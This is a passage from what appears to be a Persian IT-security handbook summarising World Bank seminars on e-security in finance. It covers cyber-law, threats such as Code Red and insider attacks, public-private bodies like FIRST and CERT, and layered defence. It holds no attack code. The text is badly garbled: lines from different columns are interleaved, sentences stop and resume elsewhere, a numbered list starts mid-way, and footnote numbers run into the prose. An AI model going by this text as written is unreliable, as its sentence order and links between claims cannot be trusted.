ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ.
ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﻗﻮﺍﻧﻴﻦ ﻭ ﺿﻮﺍﺑﻂ
ﺩﺭﺣﺎﻟﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﭘﻨﺞ ﺳﺎﻝ ﻗﺒﻞ ﭼﻨـﺪﺍﻥ
ﻣﺮﺳﻮﻡ ﻧﺒﻮﺩﻧﺪ ،ﺍﻣﺮﻭﺯ ﭼﻬﻞ ﻛﺸﻮﺭ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫـﺴﺘﻨﺪ ﻭ
ﺍﻳــﻦ ﺭﻗــﻢ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ .ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ
ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻘﻮﻕ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ
ﺍﻫﻤﻴــﺖ ﺧﺎﺻــﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻧــﺪ ﻭ ﺑــﺴﺮﻋﺖ ﺩﺭﺣــﺎﻝ ﮔــﺴﺘﺮﺵ
ﻣﻲﺑﺎﺷﻨﺪ .ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺑﺤﺚ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
۲۲۷ﺑﺮﺩﺍﺷﺖ ﻣﻘﺎﺩﻳﺮ ﺑﺴﻴﺎﺭ ﻛﻢ ﺍﺯ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺣـﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﻣﺨﺘﻠـﻒ
ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺜﺎﻟﻬــﺎﻳﻲ ﻛــﻪ ﺍﺯ ﺭﺧﻨــﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ،ﺭﺍﻩﺣﻠﻬــﺎ ﻭ ﺳﻴﺎﺳــﺘﻬﺎﻱ
ﻣﺒﺘﻜﺮﺍﻧﺔ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﭘﻲ ﻣﯽﺁﻳﻨـﺪ ،ﺑﺮﮔﺮﻓﺘـﻪ ﺍﺯ ﺩﻭ ﺳـﻤﻴﻨﺎﺭ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﺑﺮﮔﺰﺍﺭ ﺷﺪﻩﺍﻧﺪ -ﺳﻤﻴﻨﺎﺭ ﺍﻭﻝ ﺑﺎ
ﻋﻨﻮﺍﻥ "ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ :ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﻩ ﺩﺭ ﺣـﻮﺯﺓ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﯽ" ﺩﺭ ۲۵ﺳﭙﺘﺎﻣﺒﺮ ،۲۰۰۲ﻭ "ﺍﻳﻤﻨﻲ ﻭ ﺟﺎﻣﻌﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ"
ﺩﺭ ۱۰ﺳــﭙﺘﺎﻣﺒﺮ .۲۰۰۳ﻓﻴﻠﻤﻬــﺎﯼ ﻭﻳــﺪﺋﻮﻳﻲ ﻫــﺮ ﺩﻭ ﺟﻠــﺴﻪ ﺍﺯ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ ٢٢٤.ﺍﻳـﻦ ﻓـﺼﻞ ﺷـﺎﻣﻞ
ﻧﻜﺎﺕ ﻣﻬﻢ ﺍﻳﻦ ﺳﻤﻴﻨﺎﺭﻫﺎ ﻭ ﺗﻮﺿﻴﺤﺎﺕ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛـﺸﻮﺭﻫﺎﻱ
ﺷﺮﻛﺖﻛﻨﻨﺪﻩ ﺍﺳﺖ.
ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺭﺍ ﺗﺎ ﻣﺪﺗﻬﺎ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻨﺪ .ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬﺎ،
ﻧﻪﺗﻨﻬﺎ ﺗﻬﺪﻳﺪﺍﺗﻲ ﭼﻨـﺪﻭﺟﻬﻲ ﻣﺜـﻞ Code Redﻭﺟـﻮﺩ ﺩﺍﺭﺩ،
ﺑﻠﻜﻪ ﺧﻄﺮ ﺣﻠﻘﻪﻫﺎﻱ ﺟﺮﺍﺋﻢ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﻧﻔﻮﺫ ﻧﻴﺰ ﻣﺤﺘﻤﻞ ﺍﺳﺖ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺣﻠﻘـﻪﻫـﺎﻱ ﻋﻤﻠﻴـﺎﺕ ﻣﺠﺮﻣﺎﻧـﻪ ﺍﺯ ﻛﺎﺯﻳﻨﻮﻫـﺎﻱ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﭘﻮﻟﺸﻮﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ .ﻃﺒﻖ ﺗﺨﻤـﻴﻦ
ﺷﺮﻛﺖ ،Internet Dataﺣﺪﻭﺩ %۵۷ﻧﻔﻮﺫﻫـﺎ ﻋﻠﻴـﻪ ﺻـﻨﺎﻳﻊ
ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ،ﺑـﻪ ﻣـﻮﺍﺯﺍﺕ
ﭘﻴﭽﻴﺪﻩﺗﺮ ﺷﺪﻥ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ ،ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﻫﺶ
ﻣﻲ ﻳﺎﺑﺪ؛ ﭼﻮﻥ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺮﺍﻱ downloadﻭ
ﻛﺎﺭﺑﺮﺩ ،ﺩﺭ ﺩﺳﺘﺮﺱ ﻫﻤﮕﺎﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ .ﺣﺘـﻲ ﻛـﺴﺎﻧﻴﻜﻪ ﺩﺍﻧـﺶ
ﭼﻨﺪﺍﻥ ﻋﻤﻴﻘﻲ ﻧﺪﺍﺭﻧﺪ ﻧﻴﺰ ﺑﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﻗـﺪﺍﻡ ﺑـﻪ
ﻧﻔﻮﺫﻫﺎﻱ ﺑﺰﺭﮒ ﻛﻨﻨﺪ.
٢١٦
•
•
•
•
•
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﻋﺘﺒﺎﺭ ﺍﻣﻀﺎﻫﺎ ﻭ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ،ﻭ ﺍﻋـﻼﻡ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ
ﺍﺟﺮﺍﻳﻲ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻳﻤﻦ ﺍﺯ ﺍﻃﻼﻋﺎﺕ؛
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣــﻦ ﭘﺮﺩﺍﺧــﺖ ﻣﻴــﺎﻥ ﺑﺎﻧﻜﻬــﺎ ﺑﺨــﺼﻮﺹ
ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛
ﭘﻮﻟــﺸﻮﻳﻲ ﻭ ﺳــﻄﺢ ﻫﻤﻜــﺎﺭﻱ ﺑــﻴﻦ ﺍﻟﻤﻠﻠــﻲ ﻛــﻪ ﺑــﺮﺍﻱ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺁﻥ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻭ
ﺗﻮﺳﻌﻪ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ،ﻛﻪ ﻣﻘﻮﻟﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ
ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺠﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ.
•
ﻣﻤﻴﺰﻱ ﻭ ﺁﺯﻣﻮﻥ ﻓﺮﺁﻳﻨﺪﻫﺎ .ﺑﺮﺍﻱ ﺗـﺴﺮﻳﻊ ﺭﻓـﻊ ﻭ ﺭﺟـﻮﻉ
ﻛﺎﺭﻫﺎ ﺑﺎﻳﺪ ﻫﻤﻜﺎﺭﻱ ﻭﺳﻴﻌﻲ ﻣﻴﺎﻥ ﻫﻤﺔ ﻃﺮﻓﻬﺎﻱ ﺩﺭﮔﻴـﺮ
ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺎﻧﻜﻬﺎﻱ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘـﺎ ﺩﺍﺭﺍﻱ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻫﺎﻳﻲ ﺩﺭ Antiguaﻫــﺴﺘﻨﺪ .ﺍﮔــﺮ ﺍﻳــﻦ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﻛﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ ،ﺑﺎﻧﻚ ﻫﻢ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺍﺋـﻪ
ﺧﺪﻣﺎﺕ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ ،ﻭ ﺍﮔﺮ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﻓﺮﺍﺑﺨـﺸﻲ ﺑـﺎ
ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﺷﻮﺩ ،ﺍﻗﺪﺍﻣﺎﺕ ﻓﻮﺭﻳﺘﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨـﻪ ﺑـﻪ
ﺗﻌﻮﻳﻖ ﻣﻲﺍﻓﺘﺪ.
•
ﻫﻤﻜــﺎﺭﻱ ﺩﻭﻟــﺖ ﻭ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ .ﻣﻤﻜــﻦ ﺍﺳــﺖ
ﻣﺨﺎﻃﺮﺍﺗﻲ ﻛﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺟﻨﺒﺔ ﺣﻴﺜﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻣﻨﺠـﺮ
ﺑﻪ ﺧﻮﺩﺩﺍﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻥ ﺣﻮﺍﺩﺙ ﺷـﻮﻧﺪ .ﺩﺭﻧﺘﻴﺠـﻪ
ﺑﺮﮔﺰﺍﺭﻱ ﻣﻴﺰﮔﺮﺩﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﺤـﺚ ﭘﻴﺮﺍﻣـﻮﻥ ﺿـﻮﺍﺑﻂ
ﻗﺎﻧﻮﻧﻲ ﻭ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺿـﺮﻭﺭﻱ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ
ﻣﺜﺎﻟﻬــﺎﻳﻲ ﺍﺯ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺷــﺮﺍﻛﺖ ﻋﻤﻠﻴــﺎﺗﻲ ﺑﺨــﺶ
ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺖ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ ﻣﺆﺳـﺴﺔ InfraGard
NIPCﻧﺎﻡ ﺑﺮﺩ ،ﻛـﻪ ﻣﺤـﺼﻮﻝ ﻳـﻚ ﻫﻤﻜـﺎﺭﻱ ﻣﻴـﺎﻥ
ﻲ ﺻﻨﻌﺖ ﻭ ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺑـﻮﺩ ﻭ
ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ
ﺗﻮﺳﻂ FBIﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺷﺪ .ﺷـﻜﻞ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻧـﻮﻉ
ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﺎﻡ ٢٢٨FIRSTﻣﻴﺎﻥ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺗﻴﻤﻬـﺎﻱ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﺔ ﺑﺨـﺶ ﺩﻭﻟﺘـﻲ ،ﺍﻗﺘـﺼﺎﺩﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻲ
ﺗﺸﻜﻴﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻫﺪﺍﻑ FIRSTﺍﻳﺠﺎﺩ ﻫﻤﺎﻫﻨﮕﻲ ﻭ
ﻫﻤﻜﺎﺭﻱ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ ،ﻭﺍﻛﻨﺶ ﺳـﺮﻳﻊ
ﺑﻪ ﺣﻮﺍﺩﺙ ﺍﻣﻨﻴﺘﻲ ﻭ ﺗـﺮﻭﻳﺞ ﺍﺷـﺘﺮﺍﻙ ﺍﻃﻼﻋـﺎﺕ ﻣﻴـﺎﻥ
ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺳﻄﻮﺡ ﻭﺳﻴﻊ ﻋﻨـﻮﺍﻥ ﺷـﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ
ﻣﺜﺎﻟﻬــﺎ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﭘﻴﻤــﺎﻥ ﺍﻣﻨﻴ ـﺖ
ﺍﻳﻨﺘﺮﻧﺖ ٢٢٩ﻭ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ )(CERT
ﺍﺷﺎﺭﻩ ﻛﺮﺩ ،ﻛﻪ ﻣﺤﺼﻮﻝ ﻳﻚ ﻫﻤﻜﺎﺭﻱ ﻣـﺸﺘﺮﻙ ﻣﻴـﺎﻥ
ﻲ CERTﺩﺭ ﺩﺍﻧـﺸﮕﺎﻩ Carnegie
ﻣﺮﻛﺰ ﺑـﻴﻦﺍﻟﻤﻠﻠـ ﹺ
Mellonﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻏﻴﺮﺩﻭﻟﺘـﻲ
ﺍﺳﺖ.
•
ﺍﻣﻨﻴــﺖ ﭼﻨﺪﻻﻳــﻪ .ﻣﻬﻤﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ،ﺷﻴﻮﺓ ﭼﻨﺪﻻﻳﻪ ﺍﺳﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻳﻤﻨـﻲ ﺗﻨﻬـﺎ
ﺗﻮﺳﻂ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻣﻴﻦ ﻧﻤﻲﺷﻮﺩ ،ﺑﻠﻜﻪ ﺍﻓـﺮﺍﺩ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎ
ﻧﻴﺰ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﻋﻤﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ .ﺍﻋﺘﻤﺎﺩ ﺑﻴﺶ ﺍﺯ ﺣـﺪ ﺑـﻪ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺷﻤﻨﺪﻱ ﭼﻮﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻟﺰﻭﻣﹰﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺍ
ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺎﺯﻣﻨﺪ ﭘﺬﻳﺮﺵ ﺿﻮﺍﺑﻂ ﺗﻮﺳﻂ ﻋﻤﻮﻡ،
ﺩﺳﺖ ﻛﺸﻴﺪﻥ ﺍﺯ ﺗﻜـﺮﻭﻱ ﻭ ﻳﻜـﻪﺗـﺎﺯﻱ ،ﻭ ﺑـﺎﻻ ﺑـﻮﺩﻥ ﺩﺍﻧـﺶ
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺍﺳﺖ .ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻗﺒﻞ ﻣﻴـﺎﻥ ﺻـﻨﺎﻳﻊ ﻣﺘﻔـﺎﻭﺕ ﺩﺭ
ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻫﻤﻜـﺎﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ،ﺍﻣﻨﻴـﺖ ﭘﺮﺩﺍﺧﺘﻬـﺎﻱ
ﻼ ﺑـﻪ ﺗـﺪﺍﺧﻞ ﺑﺨـﺸﻬﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﻛـﺎﻣ ﹰ
ﻣﺨﺎﺑﺮﺍﺕ ﻭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺷﺎﺧﺼﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ﺭﺍ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺩﺳﺘﺮﺳﻲ ﺑـﺪﻭﻥ ﺗﺒﻌـﻴﺾ ﺑـﻪ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺳﺎﻟﻢ ﻭ ﺍﻣـﻦ" ﺗﻌﺮﻳـﻒ ﻛـﺮﺩ ،ﻭ ﺍﺯ ﻃـﺮﻑ
ﺩﻳﮕﺮ ﺁﺭﻣﺎﻥ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ "ﺩﺳﺘﺮﺳـﻲ ﻫﻤﮕـﺎﻧﻲ ﺑـﺮ ﺍﺳـﺎﺱ
ﻋﻼﻗــﻪ ﻭ ﺭﻓــﺎﻩ ﻋﻤــﻮﻣﻲ" ﺑــﻮﺩ .ﺍﻳﻨﮕﻮﻧــﻪ ﺗﻌــﺎﺭﻳﻒ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ
"ﺧﺪﻣﺎﺕ ﺍﻣﻦ" ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻤﻦﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎ ﻭ ﺩﺭﻧﻈـﺮ
ﮔﺮﻓﺘﻦ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﺑـﺼﻮﺭﺕ ﻫﻤﺰﻣـﺎﻥ ،ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ
ﻣﻲﻛﻨﺪ.
ﻧﻈﺎﺭﺕ ﻭ ﭘﻴﺸﮕﻴﺮﻱ
ﺑﺎ ﻭﺟﻮﺩ ﻣﺸﻜﻼﺕ ﻓﺮﺍﻭﺍﻥ ﭘـﺮﺩﺍﺧﺘﻦ ﺑـﻪ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎﻱ ﺩﻭﮔﺎﻧـﺔ
ﺍﻣﻨﻴﺖ ﻭ ﺻﺤﺖ ،ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﻚ ﻧﻴـﺎﺯ ﺣﻴـﺎﺗﻲ ﺑـﺮﺍﻱ
ﺑﻴﺸﺘﺮ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﻋﻤﻠـﻲ،
ﻗــﺎﻧﻮﻧﻲ ﻭ ﺣﻴﺜﻴﺘــﻲ ﺩﺭ ﻣﺤــﻴﻂ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ،ﺗــﻼﺵ ﻭ
ﻫﻤﺎﻫﻨﮕﻲ ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ .ﻃﺮﺣﻬﺎﻳﻲ ﻛﻪ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ:
•
ﺁﻣﻮﺯﺵ ،ﺁﮔـﺎﻫﻲ ﻭ ﻳـﺎﺩﮔﻴﺮﻱ ﻣﻬـﺎﺭﺕ .ﺗﺤﻘﻴـﻖ ﺑﺎﻧـﻚ
ﺟﻬﺎﻧﻲ ﻧﺸﺎﻥ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺣﺪﻭﺩ %۵۰ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﻧﺎﺷﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺟﺮﺍﻱ ﻧﺎﺩﺭﺳـﺖ
ﻲ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻴـﺰ
ﻳﺎ ﻧﺎﺗﻮﺍﻧﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘ ﹺ
ﺑﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻴﺎﻓﺰﺍﻳﻴﻢ ،ﺍﻳﻦ ﺩﺭﺻﺪ ﺑﺎﺯ ﻫﻢ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ.
228 Forum of Incident Response and Security
Teams
)229 Internet Security Alliance (www.isalliance.org
٢١٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻤﻜـﻦ ﺣﻔﺎﻇـﺖ ﻧﻤـﻲﻛﻨـﺪ.
ﺩﻭﺍﺯﺩﻩ ﻻﻳﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ ﻭ
ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺤﻴﻄﻬﺎﻱ ﺑـﺎ ﻣﻌﻤـﺎﺭﻱ ﺑـﺎﺯ ﺗﻌﺮﻳـﻒ
ﺷﺪﻩ ﻭ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭﺍﻗﻌﻲ ﻫﺮ ﻻﻳﻪ،
ﻧﻴﺎﺯ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻫﻨﮕﻔﺘﻲ ﻧﺪﺍﺭﺩ .ﺍﻳـﻦ ﺩﻭﺍﺯﺩﻩ ﻻﻳـﻪ
ﺩﺭ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨـﺶ ﻛﺘـﺎﺏ ﺗﻮﺿـﻴﺢ ﺩﺍﺩﻩ
ﺷﺪﻩﺍﻧﺪ.
ﻫﻮﺷﻤﻨﺪ( .ﺗﻮﺟﻪ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺯ ﻫـﺮ ﺭﻣـﺰ
ﻋﺒﻮﺭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻜﺒﺎﺭ ﻣﻲﺗﻮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
.۴
ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ )ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘﺔ ﺯﻧﺠﻴﺮ ﺍﻣﻨﻴﺘـﻲ( ﺭﺍ ﺍﻓـﺰﺍﻳﺶ
ﺩﻫﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ ﺭﻭﺷـﻬﺎ ﻭ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﻣﺨﺘﻠـﻒ ﺑـﺮﺍﻱ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ .ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻣﻦ ﺑﺎﺷﻨﺪ ،ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺷﺎﻣﻞ ﻧﺼﺐ ﺩﻳﻮﺍﺭﻩﻫـﺎﻱ
ﺁﺗﺶ ﺷﺨﺼﻲ ٢٣٠ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ
ﻧﻴﺰ ﻣﻲﺷﻮﺩ.
.۵
ﺭﻭﻳﺪﺍﺩﻫﺎ ﺑﺎﻳﺪ ﻣﺪﻳﺮﻳﺖ ﺷﺪﻩ ﻭ ﺑﺴﺮﻋﺖ ﮔﺰﺍﺭﺵ ﺷﻮﻧﺪ ﺗـﺎ
ﻧﺴﺒﺖ ﺑﻪ ﻭﺍﻛﻨﺶ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﺗـﻴﻢ ﺍﻣﻨﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ
ﺣﺎﺻﻞ ﺷﻮﺩ.
ﻧﻘﺶ ﻛﺸﻮﺭﻫﺎ
ﻫﻨﮓﻛﻨﮓ
ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﺍﺩﺍﺭﺓ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ ﻫﻨﮓﻛﻨﮓ ﺑـﺎ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﺳـﻪ
